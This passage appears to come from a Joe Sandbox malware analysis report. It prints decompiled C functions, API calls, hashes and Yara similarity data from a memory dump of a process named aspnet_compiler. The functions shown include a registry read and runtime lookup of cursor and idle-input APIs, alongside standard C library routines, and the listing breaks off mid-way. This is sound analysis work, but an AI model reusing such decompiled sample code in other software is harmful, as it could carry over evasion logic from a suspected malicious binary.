					_push( &_v2060);
				}
				E0040415E(_t19, _t23, _t22, _t24);
				return _t23;
			}










                    0x00412903
                    0x00412910
                    0x00412922
                    0x0041292d
                    0x0041295c
                    0x0041292f
                    0x0041293e
                    0x00412944
                    0x0041294d
                    0x00412959
                    0x00412959
                    0x00412963
                    0x0041296e

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,00473298), ref: 00412925
                    • RegQueryValueExW.ADVAPI32(?,0@,00000000,00000000,?,00000400), ref: 00412944
                    • RegCloseKey.ADVAPI32(?), ref: 0041294D
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: 0@
                    • API String ID: 3677997916-11155133
                    • Opcode ID: ccdfa338f3f44b7a88e38bb291f8a30c6f4bdc73eae542fed91e2e6e6fd2fa95
                    • Instruction ID: c7fd1c892b01a83c80440586cf5eccaa6983c25e434fa7726a62adcc2e55f33b
                    • Opcode Fuzzy Hash: ccdfa338f3f44b7a88e38bb291f8a30c6f4bdc73eae542fed91e2e6e6fd2fa95
                    • Instruction Fuzzy Hash: CCF0C275A0021CFBDB109B90EC45FDE7BBCEB04B11F1040B2BA04F5291DAB4AB949BD8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004013F2() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x4736e4 = _t2;
				return _t2;
			}




                    0x00401403
                    0x00401409
                    0x0040140e

                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                    • GetProcAddress.KERNEL32(00000000), ref: 00401403
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    • Opcode ID: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                    • Instruction ID: 339f5e680ac259f41fdaf7538df7a013b816c33a7b3ecda91f69a778ee4b915d
                    • Opcode Fuzzy Hash: d106107450db0d81a8cd297f1c1958bbeafca831e7cd1c5948616fa477c32a51
                    • Instruction Fuzzy Hash: 89B092B0585700ABC6007FB0BC0D9493A24A604703B1001B2B001A2672EB7991909E3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401497() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x47379c = _t2;
				return _t2;
			}




                    0x004014a8
                    0x004014ae
                    0x004014b3

                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                    • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    • Opcode ID: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                    • Instruction ID: a235115c4c7ff8ecad93221cd3e986331959d115ecffc12b26486691d28a12a6
                    • Opcode Fuzzy Hash: 1ce684c1e9215f277348ea1b345f6655546256602e36a9085d5b35a2dabba592
                    • Instruction Fuzzy Hash: 9BB092F05657009BCB402FA0BC0E9053B24A604713B208AB2B009A3162EB7D90909F2F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00448884 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E00448884(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E004390B7(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xff1875ff
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00435760(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00456060( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00455D60();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00455D60();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00455D60();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00448B87(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00456140(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0043EEAD();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043A5BB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                    0x00448884
                    0x0044888f
                    0x00448896
                    0x00448898
                    0x00448898
                    0x0044889a
                    0x004488a3
                    0x004488a5
                    0x004488aa
                    0x004488b0
                    0x004488c6
                    0x004488cb
                    0x004488ce
                    0x004488db
                    0x004488e0
                    0x00448934
                    0x0044893c
                    0x0044893e
                    0x00448940
                    0x00448943
                    0x00448943
                    0x00448943
                    0x00448949
                    0x00448951
                    0x00448964
                    0x00448967
                    0x00448969
                    0x0044896c
                    0x0044896d
                    0x0044898e
                    0x00448991
                    0x00448991
                    0x0044896f
                    0x0044896f
                    0x00448971
                    0x0044897c
                    0x0044897c
                    0x0044897e
                    0x00448985
                    0x00448980
                    0x00448980
                    0x00448980
                    0x0044897e
                    0x00448992
                    0x00448994
                    0x00448995
                    0x00448998
                    0x0044899a
                    0x004489a4
                    0x004489ae
                    0x0044899c
                    0x0044899c
                    0x0044899c
                    0x004489b3
                    0x004489b3
                    0x004489b8
                    0x004489bb
                    0x004489c6
                    0x004489c6
                    0x004489c6
                    0x004489c6
                    0x004489ca
                    0x004489d1
                    0x004489d2
                    0x004489d5
                    0x004489d8
                    0x004489d8
                    0x004489da
                    0x00000000
                    0x00000000
                    0x004489f2
                    0x004489f9
                    0x004489fd
                    0x00448a00
                    0x00448a03
                    0x00448a05
                    0x00448a05
                    0x00448a05
                    0x00448a07
                    0x00448a0a
                    0x00448a0d
                    0x00448a0f
                    0x00448a17
                    0x00448a1d
                    0x00448a20
                    0x00448a23
                    0x00448a24
                    0x00448a27
                    0x00448a2a
                    0x00448a2a
                    0x00448a2f
                    0x00448a32
                    0x00000000
                    0x00000000
                    0x00448a4a
                    0x00448a4f
                    0x00448a53
                    0x00000000
                    0x00000000
                    0x00448a57
                    0x00448a57
                    0x00448a5a
                    0x00448a5b
                    0x00448a5b
                    0x00448a5d
                    0x00448a60
                    0x00000000
                    0x00000000
                    0x00448a62
                    0x00448a65
                    0x00448a6c
                    0x00448a6f
                    0x00448a72
                    0x00448a88
                    0x00448a88
                    0x00448a88
                    0x00448a74
                    0x00448a74
                    0x00448a76
                    0x00448a79
                    0x00448a84
                    0x00448a7b
                    0x00448a7e
                    0x00448a7e
                    0x00448a79
                    0x00000000
                    0x00448a72
                    0x00448a67
                    0x00448a67
                    0x00448a69
                    0x00448a69
                    0x004489bd
                    0x004489bd
                    0x004489c0
                    0x00448a8b
                    0x00448a8b
                    0x00448a8d
                    0x00448a8f
                    0x00448a92
                    0x00448a93
                    0x00448a94
                    0x00448a95
                    0x00448a9d
                    0x00448a9d
                    0x00448a9d
                    0x00448a9f
                    0x00448aa2
                    0x00448aa5
                    0x00448aa7
                    0x00448aa7
                    0x00448aa9
                    0x00448abb
                    0x00448abf
                    0x00448ac2
                    0x00448ac9
                    0x00448ad1
                    0x00448ad1
                    0x00448ad4
                    0x00448ad6
                    0x00448ae7
                    0x00448ae7
                    0x00448aeb
                    0x00448aeb
                    0x00448aee
                    0x00448af0
                    0x00448af3
                    0x00000000
                    0x00448ad8
                    0x00448ad8
                    0x00448ade
                    0x00448ade
                    0x00448ae2
                    0x00448af5
                    0x00448af5
                    0x00448af9
                    0x00448afa
                    0x00448afc
                    0x00448afe
                    0x00448b3f
                    0x00448b3f
                    0x00448b41
                    0x00448b4e
                    0x00448b4e
                    0x00448b50
                    0x00448b52
                    0x00448b53
                    0x00448b54
                    0x00448b5b
                    0x00448b5e
                    0x00448b60
                    0x00448b60
                    0x00448b61
                    0x00448b63
                    0x00448b66
                    0x00448b66
                    0x00448b68
                    0x00448b6a
                    0x00000000
                    0x00448b6a
                    0x00448b43
                    0x00448b45
                    0x00000000
                    0x00000000
                    0x00448b47
                    0x00000000
                    0x00000000
                    0x00448b49
                    0x00448b4c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448b4c
                    0x00448b05
                    0x00448b0b
                    0x00448b0b
                    0x00448b0d
                    0x00448b0e
                    0x00448b0f
                    0x00448b10
                    0x00448b17
                    0x00448b1a
                    0x00448b1c
                    0x00448b1d
                    0x00448b1f
                    0x00448b2c
                    0x00448b2c
                    0x00448b2e
                    0x00448b30
                    0x00448b31
                    0x00448b32
                    0x00448b39
                    0x00448b3c
                    0x00448b3e
                    0x00448b3e
                    0x00000000
                    0x00448b3e
                    0x00448b21
                    0x00448b21
                    0x00448b23
                    0x00000000
                    0x00000000
                    0x00448b25
                    0x00000000
                    0x00000000
                    0x00448b27
                    0x00448b2a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448b2a
                    0x00448b07
                    0x00448b09
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448b09
                    0x00448ada
                    0x00448adc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00448adc
                    0x00448ad6
                    0x00000000
                    0x004489c0
                    0x004489bb
                    0x004488e2
                    0x004488e4
                    0x00000000
                    0x004488e6
                    0x004488fc
                    0x00448901
                    0x00448903
                    0x0044890f
                    0x00448915
                    0x00448916
                    0x00448918
                    0x0044891a
                    0x00448925
                    0x00448925
                    0x00448928
                    0x0044892a
                    0x0044892a
                    0x0044892d
                    0x00448905
                    0x00448905
                    0x00448905
                    0x00000000
                    0x00448903
                    0x004488b2
                    0x004488b2
                    0x004488b9
                    0x004488ba
                    0x004488bc
                    0x00448b6e
                    0x00448b72
                    0x00448b77
                    0x00448b77
                    0x00448b86
                    0x00448b86

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                    • Instruction ID: 2e0d047c9ab5e1f9e195ebe2db35710396bb8e1c860b674ed94f75fdd8067eee
                    • Opcode Fuzzy Hash: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                    • Instruction Fuzzy Hash: 26A138B19006869FFB21CF18C8917BEBBA1EF15314F18416FE885AB381CA7C9946C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004410D1 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E004410D1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0044121E(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00455E40(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x45d2a0;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x45d26c;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00455E40( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00455E40(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00455E40(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E0043EEAD();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E0043EEAD();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043A5BB();
					goto L11;
				}
				_t71 = E0043EEAD();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043A5BB();
				return _t103;
			}
































                    0x004410da
                    0x004410df
                    0x004410ff
                    0x00441100
                    0x00441102
                    0x00441105
                    0x00441107
                    0x0044111a
                    0x0044111d
                    0x0044111f
                    0x00441122
                    0x00441125
                    0x00441128
                    0x00441133
                    0x00441135
                    0x00441136
                    0x00441138
                    0x00441154
                    0x00441158
                    0x00441161
                    0x00441166
                    0x0044116d
                    0x0044117a
                    0x0044117f
                    0x00441189
                    0x0044118e
                    0x00441193
                    0x00441195
                    0x0044119c
                    0x0044119e
                    0x0044119e
                    0x004411a3
                    0x004411a8
                    0x004411a9
                    0x004411ac
                    0x004411b4
                    0x004411b4
                    0x004411b5
                    0x004411c3
                    0x004411cb
                    0x004411d8
                    0x004411d9
                    0x004411e3
                    0x004411e9
                    0x004411f3
                    0x004411fa
                    0x004411fe
                    0x00441202
                    0x00441207
                    0x0044120b
                    0x00441213
                    0x00441213
                    0x00441215
                    0x00441218
                    0x00000000
                    0x004411ae
                    0x004411ae
                    0x004411ae
                    0x004411af
                    0x004411af
                    0x00000000
                    0x004411ae
                    0x004411ac
                    0x0044113a
                    0x00441143
                    0x00441143
                    0x0044114a
                    0x0044114b
                    0x0044114d
                    0x0044114d
                    0x00000000
                    0x0044114d
                    0x0044113c
                    0x00441141
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00441141
                    0x0044112a
                    0x00000000
                    0x00000000
                    0x0044112c
                    0x00441131
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00441131
                    0x00441109
                    0x00441110
                    0x00441111
                    0x00441113
                    0x00000000
                    0x00441113
                    0x004410e1
                    0x004410e8
                    0x004410e9
                    0x004410eb
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                    • Instruction ID: 551359a9c080faf0a086328dfaf192d0d3c69e8e99468298c70d0e4e8f2cce1c
                    • Opcode Fuzzy Hash: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                    • Instruction Fuzzy Hash: 47413A71A00704EFE7249F79CC42BAA7BA9EB8C714F10462FF101DB291D779A9818784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00442303 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E00442303(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4704e4; // 0xecda90
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004443F4(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00445002(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044E33F();
									E00445002(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                    0x00442303
                    0x00442306
                    0x0044230e
                    0x00442317
                    0x0044236c
                    0x00442325
                    0x0044232b
                    0x0044232f
                    0x0044237d
                    0x0044237d
                    0x00442331
                    0x00442339
                    0x0044233c
                    0x0044233f
                    0x00442376
                    0x00442377
                    0x00000000
                    0x00442341
                    0x0044234b
                    0x00442357
                    0x00000000
                    0x00442359
                    0x00442359
                    0x0044235a
                    0x0044235b
                    0x00442361
                    0x00442366
                    0x00442369
                    0x00000000
                    0x00442369
                    0x00442357
                    0x0044233f
                    0x00442372
                    0x00442375
                    0x00000000
                    0x00442375
                    0x00442370
                    0x00000000
                    0x00442310
                    0x00442314
                    0x00442314
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                    • Instruction ID: 928698612f51615fe1cf777c5292d1b4e42623037d2c96bc68a693b0eec0e686
                    • Opcode Fuzzy Hash: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                    • Instruction Fuzzy Hash: 3F01A7B26096167EFA201E797DC1F6B221DDF917B9B70033BF921612D5DBAC8C014168
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00442382 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    C-Code - Quality: 82%
                    			E00442382(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4704e0; // 0xec46b8
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004443F4(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00445002(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044E34A(_t13);
									E00445002(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                    0x00442382
                    0x00442385
                    0x0044238d
                    0x00442396
                    0x004423e5
                    0x004423a2
                    0x004423a8
                    0x004423ac
                    0x004423f6
                    0x004423f6
                    0x004423ae
                    0x004423b6
                    0x004423b9
                    0x004423bc
                    0x004423ef
                    0x004423f0
